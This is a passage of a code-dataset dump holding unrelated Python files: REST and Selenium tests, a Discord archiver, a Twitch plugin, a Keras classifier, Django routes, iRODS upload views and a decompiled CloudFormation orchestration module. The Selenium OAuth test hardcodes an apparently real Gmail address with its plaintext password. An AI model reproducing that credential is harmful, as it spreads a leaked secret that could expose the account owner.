self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.put(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n\n def test_delete_accept_membership(self):\n \"\"\"\n Tests DELETE method on membership_accept\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {}\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.delete(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)","sub_path":"psono/restapi/tests/membership_accept.py","file_name":"membership_accept.py","file_ext":"py","file_size_in_byte":10247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"541188777","text":"import pandas as pd\n\n\nclass AdWordsAPIAccountInsightsMapper:\n\n @classmethod\n def map(cls, fields, df):\n df = df.where(df != ' --', None)\n df = df.where(pd.notnull(df), None)\n\n for field in fields:\n if field.conversion_function is not None:\n df[field.name] = df[field.name].apply(field.conversion_function)\n return df\n","sub_path":"GoogleTuring/Infrastructure/Mappings/AdWordsAPIInsightsMapper.py","file_name":"AdWordsAPIInsightsMapper.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"354604632","text":"# Copyright (c) 2015 App Annie Inc. All rights reserved.\nfrom nose.plugins.attrib import attr\n\nfrom tests import factories\nfrom tests.qa.base import CoreBaseSeleniumTestCase\nfrom tests.qa.pages.user_admin.login_page import LoginPage\nfrom webanalytics import models\nfrom tests.qa.pages.advana.connection_page.ga_connection_details_page import GooglePermissionPage, \\\n GAConnectionDetailsPage\nfrom tests.qa.pages.analytics.connection_page.connections_page import ConnectionsPage\nfrom webanalytics.advana.in_app_analytics.ga.account_management import revoke_oauth_permission\nfrom webanalytics.whitelist import set_email_list\nfrom tests.qa.constants import constants\n\n\nclass GAOauthTest(CoreBaseSeleniumTestCase):\n def setUp(self):\n CoreBaseSeleniumTestCase.setUp(self)\n self.user = factories.create_user()\n login_page = LoginPage(self.selenium)\n login_page.login(self.user.username, factories.USER_PASSWORD) # test_password\n login_page.wait_for_login_ready()\n\n self.ga_user = 'appanniegatest@gmail.com'\n self.ga_pwd = 'appannie4u1' # warning, maybe get \"sign-in attempt from this device\" issue in ci env\n self.connection_page = ConnectionsPage(self.selenium)\n # whitelist\n set_email_list('Google Analytics', ['*@appannie.com'])\n\n @attr(constants.NOT_READY)\n def c40134_add_ga_account_smoke_test(self):\n self.connection_page.goto()\n self.connection_page.add_new_ga_connection()\n current_url = self.connection_page.get_current_page_url()\n self.assertIn('google.com', current_url)\n\n @attr(constants.NOT_READY)\n def c40134_add_ga_account_successfully_test(self):\n self.google_permission_page = GooglePermissionPage(self.selenium)\n self.google_permission_page.goto_permission_page()\n self.google_permission_page.login_with_google_account(self.ga_user, self.ga_pwd)\n\n self._add_ga_connection()\n\n @attr(constants.NOT_READY)\n def c40137_remove_ga_account_will_revoke_oauth_permission_test(self):\n self.google_permission_page = GooglePermissionPage(self.selenium)\n self.google_permission_page.goto_permission_page()\n self.google_permission_page.login_with_google_account(self.ga_user, self.ga_pwd)\n\n self._add_ga_connection()\n self.selenium.find_element_by_css_selector('div.info.success a.btn').click()\n ga_connection_details_page = GAConnectionDetailsPage(self.selenium, 'no_need')\n ga_connection_details_page.delete_connection(password=factories.USER_PASSWORD)\n self.connection_page.find_element_by_css('div.choose-platform-list', wait_time=30)\n self.google_permission_page.goto_permission_page()\n\n def tearDown(self):\n CoreBaseSeleniumTestCase.tearDown(self)\n ga_accounts = models.AppcareAccount.objects.filter(user=self.user)\n for account in ga_accounts:\n revoke_oauth_permission(account, '')\n # if len(ga_accounts) == 0:\n # self.google_permission_page.revoke_first_app_in_permissions_list()\n\n def _add_ga_connection(self):\n self.connection_page.goto()\n self.connection_page.add_new_ga_connection()\n self.google_permission_page.choose_account_in_oauth_page(self.ga_user)\n self.google_permission_page.approve_permission_request()\n collecting_data_dialog = self.connection_page.get_collecting_data_dialog()\n self.assertIsNotNone(collecting_data_dialog)\n","sub_path":"tests/qa/cases/advana/web/old/google_analytics/oauth/test_ga_oauth.py","file_name":"test_ga_oauth.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"170613478","text":"#!/usr/bin/env python\n\n\n''' index() creates an indexed dictionary of nodes()\n search() searches this indexed dictionary for the author name and returns the node number\n'''\n\nimport gurk\n\n#import networkx as nx\n\ndef index():\n g = gurk.load('/var/www/vici/data/biggraph.p')\n \n nodes = g.nodes()\n gockel = {}\n #print nodes\n idx = 0\n # Indexing nodes to generate link list\n for n in nodes:\n #print('Indexing '+unicode(n))\n gockel.update([(n[0], idx,)])\n idx += 1\n \n #print('Indexing finished')\n gurk.save(gockel, '/var/www/vici/data/gockel.p')\n\n\ndef name(value):\n g = gurk.load('/var/www/vici/data/biggraph.p')\n \n i = gurk.load('/var/www/vici/data/gockel.p')\n \n #print(i.items())\n result = i[value]\n #print(g.nodes()[0])\n #print(result)\n print(g.nodes()[result])\n print(value)\n return result\n\n#index()\n#name(u'Liebig, C.')\n\n\n","sub_path":"python/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"282024851","text":"import discord\r\nfrom collections import defaultdict\r\n\r\nasync def archive_server(message):\r\n server = message.channel.guild\r\n channel = message.author\r\n\r\n #ChannelType(4) means that the server is a category, which we don't want\r\n channels = [c for c in server.channels if c.type != discord.ChannelType(4)]\r\n\r\n print('Archiving ' + server.name + '...')\r\n start_msg = f'**Archiving** ***{server.name}*** *[{{}} / {len(channels)}]*... :hourglass:'\r\n msg = await channel.send(start_msg.format(1))\r\n\r\n user_info = {}\r\n categories = defaultdict(list)\r\n for index, channel in enumerate(channels, 1):\r\n await msg.edit(content=start_msg.format(index))\r\n\r\n '''It creates issues when trying to\r\n recontruct individual users permissions,\r\n so we only save pmerissions for roles'''\r\n overwrites = {obj.id: perm._values for obj, perm in channel.overwrites.items() if obj.__class__.__name__ == 'Role'}\r\n\r\n channel_info = {\r\n 'name': channel.name,\r\n 'overwrites': overwrites\r\n }\r\n #ChannelType(0) is a text channel\r\n if channel.type == discord.ChannelType(0):\r\n messages, user_info_channel = await archive_channel(channel)\r\n user_info.update(user_info_channel)\r\n channel_info['description'] = channel.topic\r\n channel_info['messages'] = messages\r\n if channel.category is None:\r\n category = 'no-category'\r\n else:\r\n category = channel.category.name\r\n categories[category].append(channel_info)\r\n\r\n print(' Archived channel #' + channel.name)\r\n\r\n\r\n role_info = {}\r\n for role in server.roles:\r\n role_info[role.id] = {\r\n 'name': role.name,\r\n 'color': str(role.color),\r\n 'permissions': role.permissions.value\r\n }\r\n await msg.edit(content=f'**Archived** ***{server.name}*** :closed_book:')\r\n return {\r\n 'icon_url': str(server.icon_url),\r\n 'name': server.name,\r\n 'categories': dict(categories),\r\n 'user_info': user_info,\r\n 'roles': role_info}\r\n\r\nasync def archive_channel(channel):\r\n messages = []\r\n '''I'm saving all the user info here,\r\n when looping trough messages since if we\r\n were to only include the members on the server,\r\n it would cause problems if a user had sent a message\r\n and then left the server.'''\r\n user_info = {}\r\n messages_raw = await channel.history(limit=100000).flatten()\r\n for msg in messages_raw[::-1]:\r\n message = {\r\n 'content' : msg.content,\r\n 'author' : f'{msg.author.id}',\r\n 'created_at' : str(msg.created_at),\r\n 'created_at_timestamp' : msg.created_at.timestamp(),\r\n 'edited' : msg.edited_at != None,\r\n 'attachments' : [a.url for a in msg.attachments],\r\n }\r\n user_info[msg.author.id] = {\r\n 'name': msg.author.name,\r\n 'avatar_url': str(msg.author.avatar_url)\r\n }\r\n \r\n #Checks if the user is still a member of the server\r\n member = channel.guild.get_member(msg.author.id)\r\n if member is not None:\r\n user_info['roles'] = [role.id for role in member.roles]\r\n messages.append(message)\r\n return messages, user_info","sub_path":"archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"156307331","text":"from globibot.lib.plugin import Plugin\nfrom globibot.lib.decorators import command\n\nfrom globibot.lib.helpers import parsing as p\nfrom globibot.lib.helpers import formatting as f\nfrom globibot.lib.helpers.hooks import master_only\n\nfrom . import queries as q\nfrom . import constants as c\nfrom .api import TwitchAPI\nfrom .pubsub import PubSub\n\nfrom collections import namedtuple\n\nimport asyncio\n\nMonitoredChannel = namedtuple(\n 'MonitoredChannel',\n ['id', 'name', 'server_id']\n)\n\nclass Twitch(Plugin):\n\n def load(self):\n self.client_id = self.config.get(c.CLIENT_ID_KEY)\n\n if not self.client_id:\n self.warning('Missing client id: API calls might not work')\n\n self.api = TwitchAPI(self.client_id, self.debug)\n self.pubsub = PubSub(self.debug, self.run_async)\n\n self.restore_monitored()\n\n def unload(self):\n asyncio.ensure_future(self.pubsub.shutdown())\n\n '''\n Commands\n '''\n\n twitch_prefix = p.string('!twitch')\n\n @command(twitch_prefix + p.string('status') + p.bind(p.word, 'name'))\n async def twitch_channel_status(self, message, name):\n stream, channel = await asyncio.gather(\n self.api.stream(name),\n self.api.channel(name)\n )\n\n response = '`{name}` is __{status}__'\n info = dict(\n name = channel.display_name,\n status = 'online' if stream else 'offline'\n )\n\n if stream:\n response += ': `{title}`\\n\\n🕹 {game}\\n👀 {viewers:,}\\n'\n online_info = dict(\n title = stream.channel.status,\n game = stream.game,\n viewers = stream.viewers\n )\n\n info = {**info, **online_info}\n\n await self.send_message(\n message.channel,\n response.format(**info),\n delete_after=15\n )\n\n twitch_top_prefix = twitch_prefix + p.string('top')\n\n @command(twitch_top_prefix + p.string('games')\n + p.bind(p.maybe(p.integer), 'count'))\n async def twitch_top_games(self, message, count=10):\n top_games = await self.api.top_games(count)\n\n info = [\n (top_game.game.name,\n '📺 {:,}'.format(top_game.channels),\n '👀 {:,}'.format(top_game.viewers))\n for top_game in top_games\n ]\n\n await self.send_message(\n message.channel,\n 'Top {} games on Twitch right now\\n{}'\n .format(len(top_games), f.code_block(f.pad_rows(info, ' | '))),\n delete_after=15\n )\n\n @command(twitch_top_prefix + p.string('channels')\n + p.bind(p.maybe(p.integer), 'count'))\n async def twitch_top_channels(self, message, count=10):\n streams = await self.api.top_channels(count)\n\n info = [\n (stream.channel.display_name,\n '🕹 {}'.format(stream.game),\n '👀 {:,}'.format(stream.viewers),\n stream.channel.status)\n for stream in streams\n ]\n\n await self.send_message(\n message.channel,\n 'Top {} games on Twitch right now\\n{}'\n .format(len(streams), f.code_block(f.pad_rows(info, ' | '))),\n delete_after=15\n )\n\n @command(\n twitch_prefix + p.string('monitor') + p.bind(p.word, 'name'),\n master_only\n )\n async def twitch_monitor(self, message, name):\n channel = await self.api.channel(name)\n\n with self.transaction() as trans:\n trans.execute(q.add_monitored, dict(\n name = channel.name,\n server_id = message.server.id\n ))\n\n self.run_async(self.monitor_forever(channel.name, message.server))\n\n await self.send_message(\n message.channel,\n 'Now monitoring `{}`'.format(channel.display_name),\n delete_after=15\n )\n\n @command(\n twitch_prefix + p.string('unmonitor') + p.bind(p.word, 'name'),\n master_only\n )\n async def twitch_unmonitor(self, message, name):\n channel = await self.api.channel(name)\n\n await self.pubsub.unsubscribe(\n PubSub.Topics.VIDEO_PLAYBACK(channel.name),\n message.server.id\n )\n\n with self.transaction() as trans:\n trans.execute(q.remove_monitored, dict(\n name = channel.name,\n server_id = message.server.id\n ))\n\n await self.send_message(\n message.channel,\n 'Stopped monitoring `{}`'.format(channel.display_name),\n delete_after=15\n )\n\n @command(twitch_prefix + p.string('monitored'), master_only)\n async def monitored(self, message):\n with self.transaction() as trans:\n trans.execute(q.get_monitored)\n monitored = [MonitoredChannel(*row) for row in trans.fetchall()]\n\n channels = [\n channel.name for channel in monitored\n if str(channel.server_id) == message.server.id\n ]\n\n await self.send_message(\n message.channel,\n 'I\\'m currently monitoring the following channels:\\n{}'\n .format(f.code_block(channels)),\n delete_after=15\n )\n\n '''\n Details\n '''\n\n async def monitor_forever(self, name, server):\n self.info('Monitoring: {}'.format(name))\n\n channel = await self.api.channel(name)\n events = await self.pubsub.subscribe(\n PubSub.Topics.VIDEO_PLAYBACK(channel.name),\n server.id\n )\n\n async for event in events:\n self.debug(event)\n if event['type'] == 'stream-up':\n await self.send_message(\n server.default_channel,\n '`{}` just went live!\\n{}'\n .format(channel.display_name, channel.url)\n )\n if event['type'] == 'stream-down':\n await self.send_message(\n server.default_channel,\n '`{}` just went offline 😢'.format(channel.display_name)\n )\n\n self.info('Stopped monitoring: {}'.format(name))\n\n def restore_monitored(self):\n with self.transaction() as trans:\n trans.execute(q.get_monitored)\n monitored = [MonitoredChannel(*row) for row in trans.fetchall()]\n\n for channel in monitored:\n server = next(\n serv for serv in self.bot.servers\n if serv.id == str(channel.server_id)\n )\n self.run_async(self.monitor_forever(channel.name, server))\n","sub_path":"bot/plugins/twitch/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"617890928","text":"#%%\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.datasets import fetch_covtype\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom tensorflow import keras\nfrom tensorflow.python.keras import layers\n\n(data, target) = fetch_covtype(return_X_y=True)\n\nscaler = preprocessing.StandardScaler().fit(X=data)\n\ndata = scaler.transform(data)\n\nx_train, x_test, y_train, y_test = train_test_split(data, target, shuffle=True, test_size=0.2)\n\ny_train_onehot = tf.one_hot(y_train - 1, depth=7)\ny_test_onehot = tf.one_hot(y_test - 1, depth=7)\ntarget_onehot = tf.one_hot(target - 1, depth=7)\n\nBATCH_SIZE = 64\nEPOCHS = 30\nSTEPS_PER_EPOCH = 6000\n\ntrainset = tf.data.Dataset.from_tensor_slices((x_train, y_train_onehot))\ntrainset = trainset.batch(BATCH_SIZE).repeat()\n\ntestset = tf.data.Dataset.from_tensor_slices((x_test, y_test_onehot))\ntestset = testset.batch(BATCH_SIZE).repeat()\n\nmodel = keras.Sequential([\n layers.Dense(units=64, activation='relu', input_shape=(54,)),\n layers.Dense(units=64, activation='relu'),\n layers.Dense(units=32, activation='relu'),\n layers.Dense(units=16, activation='relu'),\n layers.Dense(units=7, activation='softmax')\n])\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=tf.train.AdamOptimizer(0.01),\n metrics=['accuracy'])\n\nearly_stop = tf.keras.callbacks.EarlyStopping(\n patience=5, \n monitor='val_loss', \n mode='auto'\n)\n\nckpt_callback = tf.keras.callbacks.ModelCheckpoint(\n \"./checkpoint/cp-{epoch:04d}.ckpt\",\n verbose=1,\n save_weights_only=True,\n period=10\n)\n\ntb_callback = tf.keras.callbacks.TensorBoard(\n log_dir='./log',\n batch_size=BATCH_SIZE\n)\n\nclass PrintLoss(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs):\n print('Epoch: {:03d} - loss: {:.5f} - acc: {:.5f} - \\\n val_loss: {:.5f} - val_acc: {:.5f}'.format(epoch + 1, logs['loss'], logs['acc'], logs['val_loss'], logs['val_acc']))\n\nhistory = model.fit(\n trainset,\n epochs=EPOCHS,\n steps_per_epoch=STEPS_PER_EPOCH,\n validation_data=testset,\n validation_steps=STEPS_PER_EPOCH // 4,\n verbose=0,\n callbacks=[PrintLoss()]\n)\n\n# model.fit(\n# x=data,\n# y=target_onehot,\n# epochs=EPOCHS,\n# shuffle=True,\n# validation_split=0.2,\n# steps_per_epoch=STEPS_PER_EPOCH,\n# validation_steps=STEPS_PER_EPOCH // 4,\n# callbacks=[ckpt_callback]\n# )","sub_path":"code/DNN/keras-covtype.py","file_name":"keras-covtype.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"556504017","text":"\"\"\"DataShare URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom App import views\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$',views.home),\n url(r'^logval',views.logval,name=\"logval\"),\n url(r'^vb',views.vb,name=\"vb\"),\n url(r'^dataownlog',views.dataownlog,name=\"dataownlog\"),\n url(r'^approved',views.approved,name=\"approved\"),#\n url(r'^otherslog',views.otherslog,name=\"otherslog\"),\n url(r'^loginval',views.loginval,name=\"loginval\"),\n url(r'^cloudpage',views.cloudpage,name=\"cloudpage\"),\n url(r'^inbpage',views.inbpage,name=\"inbpage\"),\n url(r'^newadmin',views.newadmin,name=\"newadmin\"),\n url(r'^signup',views.signup,name=\"signup\"),\n url(r'^data',views.data,name=\"data\"),\n url(r'^duvalu',views.duvalu,name=\"duvalu\"),\n url(r'^duind',views.duind,name=\"duind\"),\n url(r'^ind',views.ind,name=\"ind\"),\n url(r'^dq1',views.dq1,name=\"dq1\"),\n url(r'^dq2',views.dq2,name=\"dq2\"),\n url(r'^valu',views.valu,name=\"valu\"),\n url(r'^download',views.download,name=\"download\"),\n url(r'^sen',views.sen,name=\"sen\"),\n url(r'^newsen',views.newsen,name=\"newsen\"),\n url(r'^log',views.log,name=\"log\"),\n url(r'^sig',views.sig,name=\"sig\"),\n url(r'^verify',views.verify,name=\"verify\"),\n url(r'^reqfile',views.reqfile,name=\"reqfile\"),\n url(r'^deprole',views.deprole,name=\"deprole\"),\n url(r'^selected',views.selected,name=\"selected\"),\n url(r'^accesspolicy',views.accesspolicy,name=\"accesspolicy\"),\n url(r'^saving',views.saving,name=\"saving\"),\n]\n","sub_path":"DataShare/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"353236811","text":"import json\nimport os\nimport string\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom irods.session import iRODSSession\nfrom irods.exception import CollectionDoesNotExist\n\nfrom django_irods.icommands import SessionException\nfrom hs_core import hydroshare\nfrom hs_core.views.utils import authorize, upload_from_irods, ACTION_TO_AUTHORIZE\nfrom hs_core.hydroshare import utils\n\ndef search_ds(coll):\n store = {}\n file = []\n folder = []\n if coll.data_objects:\n for files in coll.data_objects:\n file.append(files.name)\n if coll.subcollections:\n for folders in coll.subcollections:\n folder.append(folders.name)\n\n store['files'] = file\n store['folder'] = folder\n return store\n\ndef check_upload_files(resource_cls, fnames_list):\n file_types = resource_cls.get_supported_upload_file_types()\n valid = False\n ext = ''\n if file_types == \".*\":\n valid = True\n else:\n for fname in fnames_list:\n ext = os.path.splitext(fname)[1].lower()\n if ext == file_types:\n valid = True\n else:\n for index in range(len(file_types)):\n file_type_str = file_types[index].strip().lower()\n if file_type_str == \".*\" or ext == file_type_str:\n valid = True\n break\n\n return (valid, ext)\n\n# Create your views here.\ndef login(request):\n if request.method == 'POST':\n port = int(request.POST['port'])\n user = str(request.POST['username'])\n password = str(request.POST['password'])\n zone = str(request.POST['zone'])\n host = str(request.POST['host'])\n datastore = \"/%s/home/%s\" % (zone, user)\n\n response_data = {}\n\n irods_sess = iRODSSession(user=user, password=password, zone=zone, host=host, port=port)\n\n try:\n irods_sess.collections.get(datastore)\n except CollectionDoesNotExist:\n response_data['irods_loggedin'] = False\n response_data['login_message'] = 'iRODS login failed'\n response_data['irods_file_names'] = ''\n response_data['error'] = \"iRODS collection does not exist\"\n irods_sess.cleanup()\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n else:\n response_data['user'] = user\n response_data['password'] = password\n response_data['port'] = port\n response_data['host'] = host\n response_data['zone'] = zone\n response_data['datastore'] = datastore\n response_data['irods_loggedin'] = True\n response_data['irods_file_names'] = ''\n irods_sess.cleanup()\n return HttpResponse(\n json.dumps(response_data),\n content_type = \"application/json\"\n )\n else:\n return HttpResponse(\n json.dumps({\"error\": \"Not POST request\"}),\n content_type=\"application/json\"\n )\n\ndef store(request):\n \"\"\"\n Get file hierarchy (collection of subcollections and data objects) for the requested directory\n in an iRODS zone the requested user has logged in.\n It is invoked by an AJAX call, so it returns json object that holds content for files and folders\n under the requested directory/collection/subcollection\n \"\"\"\n return_object = {}\n irods_sess = iRODSSession(user=str(request.POST['user']), password=str(request.POST['password']),\n zone=str(request.POST['zone']), host=str(request.POST['host']),\n port=int(request.POST['port']))\n datastore = str(request.POST['store'])\n coll = irods_sess.collections.get(datastore)\n store = search_ds(coll)\n\n return_object['files'] = store['files']\n return_object['folder'] = store['folder']\n jsondump = json.dumps(return_object)\n irods_sess.cleanup()\n return HttpResponse(\n jsondump,\n content_type = \"application/json\"\n )\n\ndef upload(request):\n if request.method == 'POST':\n file_names = str(request.POST['upload'])\n fnames_list = string.split(file_names, ',')\n\n resource_cls = hydroshare.check_resource_type(request.POST['res_type'])\n valid, ext = check_upload_files(resource_cls, fnames_list)\n\n response_data = {}\n if valid:\n response_data['file_type_error'] = ''\n response_data['irods_file_names'] = file_names\n # get selected file names without path for informational display on the page\n response_data['irods_sel_file'] = ', '.join(os.path.basename(f.rstrip(os.sep)) for f in fnames_list)\n homepath = fnames_list[0]\n response_data['irods_federated'] = utils.is_federated(homepath)\n else:\n response_data['file_type_error'] = \"Invalid file type: {ext}\".format(ext=ext)\n response_data['irods_file_names'] = ''\n response_data['irods_sel_file'] = 'No file selected.'\n\n return HttpResponse(\n json.dumps(response_data),\n content_type = \"application/json\"\n )\n else:\n return HttpResponse(\n json.dumps({\"error\": \"Not POST request\"}),\n content_type=\"application/json\"\n )\n\ndef upload_add(request):\n # add irods file into an existing resource\n res_id = request.POST['res_id']\n resource, _, _ = authorize(request, res_id, needed_permission=ACTION_TO_AUTHORIZE.EDIT_RESOURCE)\n res_files = request.FILES.getlist('files')\n extract_metadata = request.REQUEST.get('extract-metadata', 'No')\n extract_metadata = True if extract_metadata.lower() == 'yes' else False\n irods_fnames = request.POST.get('irods_file_names', '')\n irods_fnames_list = string.split(irods_fnames, ',')\n res_cls = resource.__class__\n\n # TODO: read resource type from resource, not from input file \n valid, ext = check_upload_files(res_cls, irods_fnames_list)\n source_names = []\n irods_federated = False\n if not valid:\n request.session['file_type_error'] = \"Invalid file type: {ext}\".format(ext=ext)\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n else:\n homepath = irods_fnames_list[0]\n # TODO: this should happen whether resource is federated or not\n irods_federated = utils.is_federated(homepath)\n if irods_federated:\n source_names = irods_fnames.split(',')\n else:\n user = request.POST.get('irods-username')\n password = request.POST.get(\"irods-password\")\n port = request.POST.get(\"irods-port\")\n host = request.POST.get(\"irods-host\")\n zone = request.POST.get(\"irods-zone\")\n try:\n upload_from_irods(username=user, password=password, host=host, port=port,\n zone=zone, irods_fnames=irods_fnames, res_files=res_files)\n except SessionException as ex:\n request.session['validation_error'] = ex.stderr\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n try:\n utils.resource_file_add_pre_process(resource=resource, files=res_files, user=request.user,\n extract_metadata=extract_metadata, \n source_names=source_names, folder=None)\n except hydroshare.utils.ResourceFileSizeException as ex:\n request.session['file_size_error'] = ex.message\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n except (hydroshare.utils.ResourceFileValidationException, Exception) as ex:\n request.session['validation_error'] = ex.message\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n try:\n hydroshare.utils.resource_file_add_process(resource=resource, files=res_files, \n user=request.user,\n extract_metadata=extract_metadata,\n source_names=source_names, folder=None)\n\n except (hydroshare.utils.ResourceFileValidationException, Exception) as ex:\n if ex.message:\n request.session['validation_error'] = ex.message\n elif ex.stderr:\n request.session['validation_error'] = ex.stderr\n except SessionException as ex:\n request.session['validation_error'] = ex.stderr\n\n request.session['resource-mode'] = 'edit'\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n","sub_path":"irods_browser_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380463145","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/sanhehu/Documents/GitHub/troposphere_mate-project/troposphere_mate/core/orchestration.py\n# Compiled at: 2019-08-08 16:17:45\n# Size of source mod 2**32: 9185 bytes\n\"\"\"\nImplement a Orchestration Framework.\n\"\"\"\ntry:\n from typing import List, Tuple, Dict, Type\nexcept:\n pass\n\nimport attr\nfrom collections import OrderedDict\nfrom pathlib_mate import PathCls as Path\nfrom .mate import AWSObject, Template\nfrom .canned import Canned\n\ndef resolve_pipeline(plan):\n \"\"\"\n\n :type plan: List[Tuple[str, str]]\n :param plan: [(can_id, tag), ...]\n\n :rtype: List[Tuple[List[str], str]]]\n \"\"\"\n pipeline_change_set = list()\n job = ([], None)\n previous_env = None\n for tier_name, tier_env in plan:\n if tier_env != previous_env:\n pipeline_change_set.append(job)\n previous_env = tier_env\n job = ([tier_name], tier_env)\n else:\n job[0].append(tier_name)\n\n pipeline_change_set.append(job)\n pipeline_change_set = pipeline_change_set[1:]\n dct = dict()\n pipeline = list()\n for tier_list, tier_env in pipeline_change_set:\n if tier_env in dct:\n dct[tier_env].extend(tier_list)\n else:\n dct[tier_env] = tier_list\n pipeline.append((list(dct[tier_env]), tier_env))\n\n return pipeline\n\n\nclass ResourceFilter(object):\n\n def __init__(self, allowed_stack_id_list):\n self.allowed_stack_id_list = allowed_stack_id_list\n\n def filter(self, resource, template):\n \"\"\"\n Check if we want to keep this resource in the cloudformation.\n If ``True``, we keep it. if ``False`` we call\n ``Template.remove_resource(resource)`` to remove it,\n\n :type resource: AWSObject\n :type template: Template\n :rtype: bool\n \"\"\"\n if resource.resource_type == 'AWS::CloudFormation::Stack':\n if resource.title in self.allowed_stack_id_list:\n return True\n else:\n return False\n else:\n return True\n\n\n@attr.s\nclass CanLabel(object):\n __doc__ = '\\n A wrapper around a ``troposphere_mate.Canned``. It defines the metadata\\n about the ``Canned``\\n\\n **中文文档**\\n\\n 在 ``Canned`` 之外的进一层包装. ``logic_id`` 是当 ``Canned`` 封装的 Template 会\\n 被作为 Nested Stack 时起作用的. 因为 ``troposphere`` 实现的 Template 可能在其他\\n Template 中作为 ``AWS::CloudFormation::Stack`` Resource 使用. 作为\\n Nested Stack 是不知道 Master Stack 中的 Resource Logic Id 的. ``filename``\\n 则是指定了实体文件的文件名. 因为 ``Template`` 本身只关注模板数据, 不关注模板文件.\\n\\n CanLabel 实现了 Y 轴上的编排.\\n '\n logic_id = attr.ib()\n can_class = attr.ib()\n filename = attr.ib()\n\n\n@attr.s\nclass ConfigData(object):\n __doc__ = '\\n **中文文档**\\n\\n 一串的 CanLabel (本质上是一串原子的 Nested Stack, 要么该 Stack 中的资源被全部\\n 创建, 要么全部不被创建) 构成了一个架构的设计. 而这个架构的设计可能被部署到不同的环境中,\\n 在不同的环境中, 配置数据可能不同, 实际被部署的 Nested Stack 的数量也可能不同.\\n\\n ConfigData 提供了在不同环境下 (用 env_tag 做区分) 的配置数据.\\n\\n ConfigData 实现了 X 轴上的编排.\\n '\n env_tag = attr.ib()\n data = attr.ib()\n\n\n@attr.s\nclass Note(object):\n can_id = attr.ib()\n env_tag = attr.ib()\n\n\n@attr.s\nclass TemplateFile(object):\n __doc__ = '\\n\\n **中文文档**\\n\\n 包含了 ``troposphere_mate.Template`` 的实例 以及实际的文件路径 (绝对路径)\\n '\n template = attr.ib()\n filepath = attr.ib()\n\n @filepath.validator\n def check_filepath(self, attribute, value):\n if not Path(value).is_absolute():\n raise ValueError(\"You have to use absolute path for 'TemplateFile.filepath`!\")\n\n def make_file(self, json_or_yml='json'):\n self.template.to_file((self.filepath), json_or_yml=json_or_yml)\n\n\n@attr.s\nclass ExecutionJob(object):\n __doc__ = '\\n **中文文档**\\n\\n 每个 ExecutionJob 对应一次 ``aws cloudformation deploy`` 命令的执行.\\n 本质上一个 ExecutionJob 包含了一串最终的 Template 文件实体. 所以我们需要知道\\n Master Template 的路径, 以及所有的 Template 的数据以及路径.\\n '\n master_can = attr.ib()\n master_template_path = attr.ib()\n template_file_list = attr.ib()\n\n def execute(self):\n self.master_can.dump_shell_script_json_config_file()\n self.master_can.dump_cloudformation_json_config_file()\n for template_file in self.template_file_list:\n template_file.make_file(json_or_yml='json')\n\n\nclass Orchestration(object):\n __doc__ = '\\n **中文文档**\\n\\n Orchestration 的本质是对 CanLabel 和 ConfigData 进行编排. 使用:\\n ``CanLabel.logic_id`` 和 ``ConfigData.env_tag`` 指定了编排中的某个最小单元,\\n 通过指定云架构部署的顺序, 最终实现编排.\\n\\n '\n\n def __init__(self, master_canlabel_id, canlabel_list, config_data_list, notes):\n \"\"\"\n\n :type master_canlabel_id: str\n\n :type canlabel_list: List[CanLabel]\n\n :type config_data_list: List[ConfigData]\n\n :type notes: List[Note]\n \"\"\"\n self.master_canlabel_id = master_canlabel_id\n self.canlabel_mapper = OrderedDict([(canlabel.logic_id, canlabel) for canlabel in canlabel_list])\n self.config_data_mapper = 